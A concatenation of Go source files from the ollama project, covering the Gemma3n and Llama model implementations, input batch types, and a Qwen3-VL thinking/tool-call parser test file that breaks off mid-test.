package gemma3n import ( "cmp" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model/input" ) type TextModel struct { TokenEmbedding *TextScaledWordEmbedding `gguf:"token_embd"` *PerLayerProjector AltupEmbd *nn.Linear `gguf:"altup_proj"` AltupUnembd *nn.Linear `gguf:"altup_unembd_proj"` TextLayers []TextLayer `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` TextOptions } func (m *TextModel) Forward(ctx ml.Context, batch input.Batch, cache kvcache.Cache) (ml.Tensor, error) { positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) // Create a tensor of a single float32 value of 1.0 to use for altup correction one := ctx.Input().FromFloats([]float32{1.0}, 1) inputs := m.TokenEmbedding.Forward(ctx, batch.Inputs, math.Sqrt(float64(m.hiddenSize))) inputsPerLayer := m.PerLayerProjector.Forward(ctx, batch, inputs, &m.TextOptions) targetMagnitude := inputs.Sqr(ctx).Mean(ctx).Sqrt(ctx) targetMagnitude = targetMagnitude.Repeat(ctx, 2, m.altupInputs-1) hiddenState := inputs.Repeat(ctx, 2, m.altupInputs-1) altupProj := m.AltupEmbd.Forward(ctx, hiddenState) altupProj = altupProj.Mul(ctx, targetMagnitude.Div(ctx, altupProj.Sqr(ctx).Mean(ctx).Sqrt(ctx))) hiddenStates := inputs.Concat(ctx, altupProj, 2) firstSharedKeyValue := m.hiddenLayers - m.sharedKeyValueLayers for i, layer := range m.TextLayers { if i < firstSharedKeyValue { cache.SetLayer(i) } else if m.isLocal(i) { cache.SetLayer(firstSharedKeyValue - 2) } else { cache.SetLayer(firstSharedKeyValue - 1) } var layerType int ropeBase := m.ropeBase if m.isLocal(i) { layerType = 1 ropeBase = m.ropeBaseLocal } cache.(*kvcache.WrapperCache).SetLayerType(layerType) // inputPerLayer = inputsPerLayer[:, i, :].squeeze(1) inputPerLayer := inputsPerLayer.View(ctx, i*inputsPerLayer.Stride(1), inputsPerLayer.Dim(0), inputsPerLayer.Stride(2), inputsPerLayer.Dim(2)) hiddenStates = layer.Forward(ctx, hiddenStates, inputPerLayer, positions, one, cache, i >= firstSharedKeyValue, ropeBase, float64(m.activationSparsityScale[i]), &m.TextOptions) } // hiddenStates = hiddenStates[:, :, 0] hiddenStates0 := hiddenStates.Slice(ctx, 2, 0, 1, 1) targetMagnitude = hiddenStates0.Sqr(ctx).Mean(ctx).Sqrt(ctx) targetMagnitude = targetMagnitude.Repeat(ctx, 2, m.altupInputs-1) // hiddenState = hiddenStates[:, :, 1:] hiddenState = hiddenStates.Slice(ctx, 2, 1, hiddenStates.Dim(2), 1) altupUnembdProj := m.AltupUnembd.Forward(ctx, hiddenState) altupUnembdProj = altupUnembdProj.Mul(ctx, targetMagnitude.Div(ctx, altupUnembdProj.Sqr(ctx).Mean(ctx).Sqrt(ctx))) hiddenStates = hiddenStates0.Concat(ctx, altupUnembdProj, 2) hiddenStates = hiddenStates.Permute(ctx, 1, 2, 0, 3).Contiguous(ctx).Mean(ctx) hiddenStates = hiddenStates.Permute(ctx, 2, 0, 1, 3).Contiguous(ctx) hiddenStates = hiddenStates.Rows(ctx, batch.Outputs) hiddenStates = m.OutputNorm.Forward(ctx, hiddenStates, m.eps) return m.Output.Forward(ctx, hiddenStates), nil } func (m *TextModel) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { ropeBase := m.ropeBase if m.isLocal(layer) { ropeBase = m.ropeBaseLocal } return m.applyRotaryPositionEmbeddings(ctx, key, shift, ropeBase), nil } type TextScaledWordEmbedding struct { *nn.Embedding } func (e TextScaledWordEmbedding) Forward(ctx ml.Context, inputIDs ml.Tensor, scale float64) ml.Tensor { return e.Embedding.Forward(ctx, inputIDs).Scale(ctx, scale) } type PerLayerProjector struct { TokenEmbedding *TextScaledWordEmbedding `gguf:"per_layer_token_embd"` Projector *nn.Linear `gguf:"per_layer_model_proj"` Norm *nn.RMSNorm `gguf:"per_layer_proj_norm"` } func (p PerLayerProjector) Forward(ctx ml.Context, batch input.Batch, inputs ml.Tensor, opts *TextOptions) ml.Tensor { inputsPerLayer := p.TokenEmbedding.Forward(ctx, batch.Inputs, math.Sqrt(float64(opts.hiddenSizePerLayerInput))) inputsPerLayer = inputsPerLayer.Reshape(ctx, opts.hiddenSizePerLayerInput, opts.hiddenLayers, batch.Inputs.Dim(0), batch.Inputs.Dim(1)) perLayerProjection := p.Projector.Forward(ctx, inputs) perLayerProjection = perLayerProjection.Scale(ctx, math.Sqrt(float64(opts.hiddenSize))) perLayerProjection = perLayerProjection.Reshape(ctx, opts.hiddenSizePerLayerInput, opts.hiddenLayers, inputs.Dim(1)) perLayerProjection = p.Norm.Forward(ctx, perLayerProjection, opts.eps) if inputsPerLayer != nil { perLayerProjection = perLayerProjection.Add(ctx, inputsPerLayer) perLayerProjection = perLayerProjection.Scale(ctx, 1/math.Sqrt(2)) } return perLayerProjection } type TextLayer struct { *AltUp *Laurel AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` Attention *TextAttention PostAttentionNorm *nn.RMSNorm `gguf:"post_attention_norm"` MLPNorm *nn.RMSNorm `gguf:"ffn_norm"` MLP *TextMLP PostMLPNorm *nn.RMSNorm `gguf:"post_ffw_norm"` PerLayerInputGate *nn.Linear `gguf:"inp_gate"` PerLayerProjection *nn.Linear `gguf:"proj"` PostPerLayerNorm *nn.RMSNorm `gguf:"post_norm"` } func (d TextLayer) Forward(ctx ml.Context, hiddenStates, perLayerInput, positions, one ml.Tensor, cache kvcache.Cache, sharedKV bool, ropeBase float32, activationSparsityScale float64, opts *TextOptions) ml.Tensor { predictions := d.Predict(ctx, hiddenStates, opts) active := opts.altupActive(ctx, predictions) attn := d.AttentionNorm.Forward(ctx, active, opts.eps) laurel := d.Laurel.Forward(ctx, attn, opts) attn = d.Attention.Forward(ctx, attn, positions, cache, sharedKV, ropeBase, opts) attn = d.PostAttentionNorm.Forward(ctx, attn, opts.eps) attn = active.Add(ctx, attn) attn = attn.Add(ctx, laurel).Scale(ctx, 1/math.Sqrt(2)) mlp := d.MLPNorm.Forward(ctx, attn, opts.eps) mlp = d.MLP.Forward(ctx, mlp, activationSparsityScale) mlp = d.PostMLPNorm.Forward(ctx, mlp, opts.eps) mlp = attn.Add(ctx, mlp) predictions = d.Correct(ctx, predictions, mlp, one, opts) active = opts.altupActive(ctx, predictions) if opts.altupCorrectScale { active = d.ScaleCorrectedOutput(ctx, active) } active = d.PerLayerInputGate.Forward(ctx, active) active = active.GELU(ctx, perLayerInput) active = d.PerLayerProjection.Forward(ctx, active) active = d.PostPerLayerNorm.Forward(ctx, active, opts.eps) // inactive := predictions[:, :, 1:] inactive := predictions.Slice(ctx, 2, 1, predictions.Dim(2), 1) active = inactive.Add(ctx, active) predictions0 := predictions.Slice(ctx, 2, 0, 1, 1) return predictions0.Concat(ctx, active, 2) } type AltUp struct { CorrectionScale ml.Tensor `gguf:"altup_correct_scale.weight"` PredictionCoefficient *nn.Linear `gguf:"altup_predict_coef"` CorrectionCoefficient *nn.Linear `gguf:"altup_correct_coef"` Router *nn.Linear `gguf:"altup_router"` RouterNorm *nn.RMSNorm `gguf:"altup_router_norm"` } func (a AltUp) computeRouterModalities(ctx ml.Context, hiddenStates ml.Tensor, opts *TextOptions) ml.Tensor { routerInputs := a.RouterNorm.Forward(ctx, hiddenStates, opts.eps).Scale(ctx, 1.0/float64(opts.hiddenSize)) return a.Router.Forward(ctx, routerInputs).Tanh(ctx) } func (a AltUp) Predict(ctx ml.Context, hiddenStates ml.Tensor, opts *TextOptions) ml.Tensor { modalities := a.computeRouterModalities(ctx, opts.altupActive(ctx, hiddenStates), opts) coefficients := a.PredictionCoefficient.Forward(ctx, modalities) coefficients = coefficients.Reshape(ctx, opts.altupInputs, opts.altupInputs, coefficients.Dim(1), coefficients.Dim(2)) predictions := coefficients.Mulmat(ctx, hiddenStates.Permute(ctx, 1, 2, 0, 3).Contiguous(ctx)) predictions = predictions.Permute(ctx, 2, 0, 1, 3).Contiguous(ctx) return predictions.Add(ctx, hiddenStates) } func (a AltUp) Correct(ctx ml.Context, predictions, activated, one ml.Tensor, opts *TextOptions) ml.Tensor { innovation := activated.Sub(ctx, opts.altupActive(ctx, predictions)) innovation = innovation.Repeat(ctx, 2, opts.altupInputs) modalities := a.computeRouterModalities(ctx, activated, opts) coefficients := a.CorrectionCoefficient.Forward(ctx, modalities) coefficients = coefficients.Add(ctx, one) coefficients = coefficients.Reshape(ctx, 1, coefficients.Dim(0), coefficients.Dim(1)) coefficients = coefficients.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx) corrected := innovation.Mul(ctx, coefficients) corrected = corrected.Add(ctx, predictions) return corrected } func (a AltUp) ScaleCorrectedOutput(ctx ml.Context, predictions ml.Tensor) ml.Tensor { return predictions.Mul(ctx, a.CorrectionScale) } type Laurel struct { LinearLeft *nn.Linear `gguf:"laurel_l"` LinearRight *nn.Linear `gguf:"laurel_r"` PostLaurelNorm *nn.RMSNorm `gguf:"laurel_post_norm"` } func (l Laurel) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *TextOptions) ml.Tensor { residual := hiddenStates hiddenStates = l.LinearLeft.Forward(ctx, hiddenStates) hiddenStates = l.LinearRight.Forward(ctx, hiddenStates) hiddenStates = l.PostLaurelNorm.Forward(ctx, hiddenStates, opts.eps) return hiddenStates.Add(ctx, residual) } type TextAttention struct { Query *nn.Linear `gguf:"attn_q"` QueryNorm *nn.RMSNorm `gguf:"attn_q_norm"` Key *nn.Linear `gguf:"attn_k"` KeyNorm *nn.RMSNorm `gguf:"attn_k_norm"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (attn TextAttention) Forward(ctx ml.Context, hiddenStates, positions ml.Tensor, cache kvcache.Cache, sharedKV bool, ropeBase float32, opts *TextOptions) ml.Tensor { batchSize := hiddenStates.Dim(1) query := attn.Query.Forward(ctx, hiddenStates) query = query.Reshape(ctx, opts.headDim(), opts.numHeads, batchSize) query = attn.QueryNorm.Forward(ctx, query, opts.eps) query = opts.applyRotaryPositionEmbeddings(ctx, query, positions, ropeBase) var key, value ml.Tensor if !sharedKV { key = attn.Key.Forward(ctx, hiddenStates) key = key.Reshape(ctx, opts.headDim(), opts.numKVHeads, batchSize) key = attn.KeyNorm.Forward(ctx, key, opts.eps) key = opts.applyRotaryPositionEmbeddings(ctx, key, positions, ropeBase) value = attn.Value.Forward(ctx, hiddenStates) value = value.Reshape(ctx, opts.headDim(), opts.numKVHeads, batchSize) value = value.RMSNorm(ctx, nil, opts.eps) } attention := nn.Attention(ctx, query, key, value, 1., cache) attention = attention.Reshape(ctx, attention.Dim(0)*attention.Dim(1), batchSize) return attn.Output.Forward(ctx, attention) } type TextMLP struct { Gate *nn.Linear `gguf:"ffn_gate"` Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (mlp TextMLP) Forward(ctx ml.Context, hiddenStates ml.Tensor, activationSparsityScale float64) ml.Tensor { upStates := mlp.Up.Forward(ctx, hiddenStates) hiddenStates = mlp.Gate.Forward(ctx, hiddenStates) if activationSparsityScale > 0 { mean := hiddenStates.Mean(ctx) std := hiddenStates.Stddev(ctx).Scale(ctx, activationSparsityScale) cutoff := mean.Add(ctx, std) hiddenStates = hiddenStates.Sub(ctx, cutoff).RELU(ctx) } hiddenStates = hiddenStates.GELU(ctx, upStates) hiddenStates = mlp.Down.Forward(ctx, hiddenStates) return hiddenStates } type TextOptions struct { hiddenLayers int hiddenSize int hiddenSizePerLayerInput int numHeads, numKVHeads int keyLength, valueLength int sharedKeyValueLayers int altupActiveIndex int altupInputs int altupCorrectScale bool eps float32 ropeBase float32 ropeBaseLocal float32 ropeScale float32 slidingWindowPattern []bool activationSparsityScale []float32 } func (o *TextOptions) altupActive(ctx ml.Context, t ml.Tensor) ml.Tensor { // t[:, :, o.altupActiveIndex] return t.Slice(ctx, 2, o.altupActiveIndex, o.altupActiveIndex+1, 1) } func (o *TextOptions) headDim() int { return cmp.Or(o.keyLength, o.valueLength, o.hiddenSize/o.numHeads) } func (o *TextOptions) isLocal(i int) bool { return o.slidingWindowPattern[i] } func (o TextOptions) applyRotaryPositionEmbeddings(ctx ml.Context, t, p ml.Tensor, base float32) ml.Tensor { return nn.RoPE(ctx, t, p, o.headDim(), base, 1./o.ropeScale, rope.WithTypeNeoX()) } func newTextModel(c fs.Config) *TextModel { return &TextModel{ TextLayers: make([]TextLayer, c.Uint("block_count")), TextOptions: TextOptions{ hiddenLayers: int(c.Uint("block_count")), hiddenSize: int(c.Uint("embedding_length")), hiddenSizePerLayerInput: int(c.Uint("embedding_length_per_layer_input")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), keyLength: int(c.Uint("attention.key_length")), valueLength: int(c.Uint("attention.value_length")), sharedKeyValueLayers: int(c.Uint("attention.shared_kv_layers")), altupActiveIndex: int(c.Uint("altup.active_idx")), altupInputs: int(c.Uint("altup.num_inputs")), eps: c.Float("attention.layer_norm_rms_epsilon", 1e-06), ropeBase: c.Float("rope.freq_base", 1_000_000), ropeBaseLocal: c.Float("rope.freq_base_local", 10_000), ropeScale: c.Float("rope.scaling.factor", 1.0), slidingWindowPattern: c.Bools("attention.sliding_window_pattern"), activationSparsityScale: c.Floats("activation_sparsity_scale"), }, } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/llama/model.go
model/models/llama/model.go
package llama import ( "cmp" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Options struct { hiddenSize, numHeads, numKVHeads int headDim, ropeDim int eps, ropeBase, ropeScale float32 } func (o Options) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions, factors ml.Tensor) ml.Tensor { return nn.RoPE(ctx, states, positions, cmp.Or(o.ropeDim, o.headDim, o.hiddenSize/o.numHeads), o.ropeBase, 1./o.ropeScale, rope.WithFactors(factors)) } type Model struct { model.Base model.TextProcessor TokenEmbedding *nn.Embedding `gguf:"token_embd"` Layers []Layer `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` Options } func New(c fs.Config) (model.Model, error) { if c.Uint("expert_count") > 0 { // TODO: support mixtures of experts return nil, model.ErrUnsupportedModel } var processor model.TextProcessor vocabulary := model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Scores: c.Floats("tokenizer.ggml.scores"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), } switch c.String("tokenizer.ggml.model") { case "gpt2": var pretokenizers []string switch c.String("tokenizer.ggml.pre") { case "default": // no-op use the default bpe pretokenizer case "qwen2": pretokenizers = []string{ "(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\\r\\n\\p{L}\\p{N}]?\\p{L}+|\\p{N}| ?[^\\s\\p{L}\\p{N}]+[\\r\\n]*|\\s*[\\r\\n]+|\\s+(?!\\S)|\\s+", } case "refact": pretokenizers = []string{ `\p{N}`, `'s|'t|'re|'ve|'m|'ll|'d| ?\p{L}+| ?\p{N}+| ?[^\s\p{L}\p{N}]+|\s+(?!\S)|\s+`, } case "tekken": pretokenizers = []string{ "[^\\r\\n\\p{L}\\p{N}]?[\\p{Lu}\\p{Lt}\\p{Lm}\\p{Lo}\\p{M}]*[\\p{Ll}\\p{Lm}\\p{Lo}\\p{M}]+|[^\\r\\n\\p{L}\\p{N}]?[\\p{Lu}\\p{Lt}\\p{Lm}\\p{Lo}\\p{M}]+[\\p{Ll}\\p{Lm}\\p{Lo}\\p{M}]*|\\p{N}| ?[^\\s\\p{L}\\p{N}]+[\\r\\n/]*|\\s*[\\r\\n]+|\\s+(?!\\S)|\\s+", } default: // use a llama-style pretokenizer pretokenizers = []string{ "(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\\r\\n\\p{L}\\p{N}]?\\p{L}+|\\p{N}{1,3}| ?[^\\s\\p{L}\\p{N}]+[\\r\\n]*|\\s*[\\r\\n]+|\\s+(?!\\S)|\\s+", } } processor = model.NewBytePairEncoding(&vocabulary, pretokenizers...) case "llama": processor = model.NewSentencePiece(&vocabulary) default: return nil, model.ErrUnsupportedTokenizer } m := Model{ TextProcessor: processor, Layers: make([]Layer, c.Uint("block_count")), Options: Options{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), headDim: int(c.Uint("attention.key_length")), ropeDim: int(c.Uint("rope.dimension_count")), eps: c.Float("attention.layer_norm_rms_epsilon"), ropeBase: c.Float("rope.freq_base", 1e5), ropeScale: c.Float("rope.scaling.factor", 1), }, } m.Cache = kvcache.NewCausalCache(m.Shift) return &m, nil } type SelfAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` RopeFactors ml.Tensor `gguf:"rope_freqs.weight"` } func (sa *SelfAttention) Forward(ctx ml.Context, hiddenState, positions ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { batchSize := hiddenState.Dim(1) headDim := cmp.Or(opts.headDim, opts.hiddenSize/opts.numHeads) query := sa.Query.Forward(ctx, hiddenState) query = query.Reshape(ctx, headDim, opts.numHeads, batchSize) key := sa.Key.Forward(ctx, hiddenState) key = key.Reshape(ctx, headDim, opts.numKVHeads, batchSize) value := sa.Value.Forward(ctx, hiddenState) value = value.Reshape(ctx, headDim, opts.numKVHeads, batchSize) query = opts.applyRotaryPositionEmbeddings(ctx, query, positions, sa.RopeFactors) key = opts.applyRotaryPositionEmbeddings(ctx, key, positions, sa.RopeFactors) attention := nn.Attention(ctx, query, key, value, 1.0/math.Sqrt(float64(headDim)), cache) attention = attention.Reshape(ctx, headDim*opts.numHeads, batchSize) return sa.Output.Forward(ctx, attention) } func (m *Model) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { return m.applyRotaryPositionEmbeddings(ctx, key, shift, m.Layers[layer].SelfAttention.RopeFactors), nil } type MLP struct { Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` Gate *nn.Linear `gguf:"ffn_gate"` } func (mlp *MLP) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *Options) ml.Tensor { hiddenState = mlp.Gate.Forward(ctx, hiddenState).SILU(ctx, mlp.Up.Forward(ctx, hiddenState)) return mlp.Down.Forward(ctx, hiddenState) } type Layer struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` SelfAttention *SelfAttention MLPNorm *nn.RMSNorm `gguf:"ffn_norm"` MLP *MLP } func (l *Layer) Forward(ctx ml.Context, hiddenState, positions, outputs ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { residual := hiddenState hiddenState = l.AttentionNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = l.SelfAttention.Forward(ctx, hiddenState, positions, cache, opts) // In the final layer (outputs != nil), optimize by pruning to just the token positions // we need logits for. if outputs != nil { hiddenState = hiddenState.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenState = hiddenState.Add(ctx, residual) residual = hiddenState hiddenState = l.MLPNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = l.MLP.Forward(ctx, hiddenState, opts) return hiddenState.Add(ctx, residual) } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) hiddenState := m.TokenEmbedding.Forward(ctx, batch.Inputs) for i, layer := range m.Layers { m.Cache.SetLayer(i) var outputs ml.Tensor if i == len(m.Layers)-1 { outputs = batch.Outputs } hiddenState = layer.Forward(ctx, hiddenState, positions, outputs, m.Cache, &m.Options) } hiddenState = m.OutputNorm.Forward(ctx, hiddenState, m.eps) return m.Output.Forward(ctx, hiddenState), nil } func init() { model.Register("llama", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/input/input.go
model/input/input.go
package input import "github.com/ollama/ollama/ml" // Multimodal is a multimodal embedding or a component of one. // For example, it could be a row of an image that can be processed // independently. type Multimodal struct { // Tensor is the embedding data. Implementations may chose what to // store here or it may be nil if not needed. However, any ml.Tensor // objects must be stored here and not in Data. Tensor ml.Tensor // Data is implementation-specific opaque data, such as metadata on how // to layout Tensor. It may be nil if not needed. It may also store larger // objects such as complete images if they are to be processed later. Data any } // Input represents one token in the input stream type Input struct { // Token is a single element of text. Token int32 // Multimodal is represents a non-text element such as an // image (or part of one if the image can be processed in pieces). // It may be used either together with Token or on its own. Multimodal []Multimodal // MultimodalHash is a unique representation of the data // stored in Multimodal, used for caching and comparing // equality. MultimodalHash uint64 // SameBatch forces the following number of tokens to be processed // in a single batch, breaking and extending batches as needed. // Useful for things like images that must be processed in one // shot. SameBatch int } // MultimodalIndex is a multimodal element (such as an image) // together with an index into the slice of Inputs with the // corresponding token. Note that the index is not the same // as the position - to find that use the index with the // Positions slice. type MultimodalIndex struct { Index int Multimodal []Multimodal } // Batch contains the inputs for a model forward pass type Batch struct { // Inputs is the input tokens, including placeholders for multimodal inputs. Inputs ml.Tensor // Outputs are the set of indicies into Inputs for which output data should // be returned. Outputs ml.Tensor // Positions is the position for each Input, relative to its sequence. Equal // in length to Inputs. Positions []int32 // Sequences is the sequence for each Input. Equal in length to Inputs. Sequences []int // Multimodal is a set of multimodal embeddings previously created by // EncodeMultimodal, along with an index into Inputs. Unused for text-only // models or for batches without multimodal elements. Multimodal []MultimodalIndex }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/qwen3vl_thinking_test.go
model/parsers/qwen3vl_thinking_test.go
package parsers import ( "reflect" "testing" "github.com/ollama/ollama/api" ) func TestQwen3VLThinkingParserStreaming(t *testing.T) { type step struct { input string wantEvents []qwenEvent } cases := []struct { desc string steps []step only bool }{ { desc: "simple thinking", steps: []step{ {input: "abc</think>", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "abc"}}}, }, }, { desc: "simple trip thinking", steps: []step{ {input: "<think>abc</think>", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "<think>abc"}}}, }, }, { desc: "thinking with split tags", steps: []step{ {input: "abc", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "abc"}}}, {input: "</think>", wantEvents: []qwenEvent{}}, }, }, { desc: "multiple think tags", steps: []step{ {input: "abc<think>actually, is not thinking</think>", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "abc<think>actually, is not thinking"}}}, }, }, { desc: "thinking and tool call", steps: []step{ { input: "I'm thinking</think><tool_call>I'm tool calling</tool_call>", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "I'm thinking"}, qwenEventRawToolCall{raw: "I'm tool calling"}, }, }, }, }, { desc: "thinking and content", steps: []step{ { input: "I'm thinking</think>I'm content", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "I'm thinking"}, qwenEventContent{content: "I'm content"}, }, }, }, }, { desc: "thinking and tool call and content", }, { desc: "nested thinking (outside thinking, inside thinking)", steps: []step{ { input: "I'm thinking<think>I'm nested thinking</think></think>", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "I'm thinking<think>I'm nested thinking"}, qwenEventContent{content: "</think>"}, }, }, }, }, { desc: "interleaved thinking", steps: []step{ { input: "<think>I'm thinking</think>I'm actually content</think>", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "<think>I'm thinking"}, qwenEventContent{content: "I'm actually content</think>"}, }, }, }, }, { desc: "nested thinking and tool call (outside thinking, inside tool call)", steps: []step{ { input: "I'm thinking<tool_call>I'm nested tool call</tool_call></think>", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "I'm thinking<tool_call>I'm nested tool call</tool_call>"}}, }, }, }, { desc: "nested thinking and tool call (outside tool call, inside thinking)", steps: []step{ { input: "<tool_call>I'm nested tool call<think>I'm thinking</think></tool_call>", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "<tool_call>I'm nested tool call<think>I'm thinking"}, qwenEventContent{content: "</tool_call>"}, }, }, }, }, { desc: "interleaved thinking and tool call", steps: []step{ { input: "I'm thinking<tool_call>I'm NOT a nested tool call</think></tool_call><tool_call>I'm nested tool call 2<think></tool_call></think>", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "I'm thinking<tool_call>I'm NOT a nested tool call"}, qwenEventContent{content: "</tool_call>"}, qwenEventRawToolCall{raw: "I'm nested tool call 2<think>"}, qwenEventContent{content: "</think>"}, }, }, }, }, { desc: "partial thinking tag fakeout", steps: []step{ { input: "abc</think", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "abc"}}, }, { input: " fakeout", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "</think fakeout"}}, }, }, }, { desc: "partial thinking incomplete", steps: []step{ { input: "abc<think>unfinished</think", // when something is ambiguious, we dont emit anything wantEvents: []qwenEvent{qwenEventThinkingContent{content: "abc<think>unfinished"}}, }, }, }, { desc: "test with split thinking and content", steps: []step{ { input: "abc<think>unfinished</th", // when something is ambiguious, we dont emit anything wantEvents: []qwenEvent{qwenEventThinkingContent{content: "abc<think>unfinished"}}, }, { input: "ink> def", wantEvents: []qwenEvent{ qwenEventContent{content: "def"}, }, }, }, }, { desc: "thinking with no tags", steps: []step{ { input: "Hello I am thinking", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "Hello I am thinking"}, }, }, { input: "Hello I am thinking some more", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "Hello I am thinking some more"}, }, }, { input: "Hello I am think</think> NOT", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "Hello I am think"}, qwenEventContent{content: "NOT"}, }, }, }, }, } anyOnlies := false for _, tc := range cases { if tc.only { anyOnlies = true } } for _, tc := range cases { if anyOnlies && !tc.only { continue } t.Run(tc.desc, func(t *testing.T) { parser := Qwen3VLParser{hasThinkingSupport: true} parser.Init([]api.Tool{}, nil, nil) // parser.state = CollectingThinkingContent for i, step := range tc.steps { parser.buffer.WriteString(step.input) gotEvents := parser.parseEvents() if len(gotEvents) == 0 && len(step.wantEvents) == 0 { // avoid deep equal on empty vs. nil slices continue } if !reflect.DeepEqual(gotEvents, step.wantEvents) { t.Errorf("step %d: input %q: got events %#v, want %#v", i, step.input, gotEvents, step.wantEvents) } } }) } } func TestQwen3VLThinkingToolParser(t *testing.T) { type step struct { name string rawToolCall string tools []api.Tool wantToolCall api.ToolCall } steps := []step{ { name: "simple tool call", tools: []api.Tool{}, rawToolCall: `{"name": "get-current-weather", "arguments": {"location": "San Francisco, CA", "unit": "fahrenheit"}}`, wantToolCall: api.ToolCall{ Function: api.ToolCallFunction{ Name: "get-current-weather", Arguments: testArgs(map[string]any{ "location": "San Francisco, CA", "unit": "fahrenheit", }), }, }, }, { name: "names with spaces", tools: []api.Tool{}, rawToolCall: `{"name": "get current temperature", "arguments": {"location with spaces": "San Francisco", "unit with spaces": "celsius"}}`, wantToolCall: api.ToolCall{ Function: api.ToolCallFunction{ Name: "get current temperature", Arguments: testArgs(map[string]any{ "location with spaces": "San Francisco", "unit with spaces": "celsius", }), }, }, }, { name: "names with quotes", tools: []api.Tool{}, rawToolCall: `{"name": "\"get current temperature\"", "arguments": {"\"location with spaces\"": "San Francisco", "\"unit with spaces\"": "\"celsius\""}}`, wantToolCall: api.ToolCall{ Function: api.ToolCallFunction{ Name: "\"get current temperature\"", Arguments: testArgs(map[string]any{ "\"location with spaces\"": "San Francisco", "\"unit with spaces\"": "\"celsius\"", }), }, }, }, { name: "tool call with typed parameters (json types)", tools: []api.Tool{}, rawToolCall: `{"name": "calculate", "arguments": {"x": 3.14, "y": 42, "enabled": true, "items": ["a", "b", "c"]}}`, wantToolCall: api.ToolCall{ Function: api.ToolCallFunction{ Name: "calculate", Arguments: testArgs(map[string]any{ "x": 3.14, "y": float64(42), "enabled": true, "items": []any{"a", "b", "c"}, }), }, }, }, { name: "ampersands in parameter values", tools: []api.Tool{}, rawToolCall: `{"name": "exec", "arguments": {"command": "ls && echo \"done\""}}`, wantToolCall: api.ToolCall{ Function: api.ToolCallFunction{ Name: "exec", Arguments: testArgs(map[string]any{ "command": "ls && echo \"done\"", }), }, }, }, { name: "angle brackets in parameter values", tools: []api.Tool{}, rawToolCall: `{"name": "exec", "arguments": {"command": "ls && echo \"a > b and a < b\""}}`, wantToolCall: api.ToolCall{ Function: api.ToolCallFunction{ Name: "exec", Arguments: testArgs(map[string]any{ "command": "ls && echo \"a > b and a < b\"", }), }, }, }, { name: "unicode in function names and 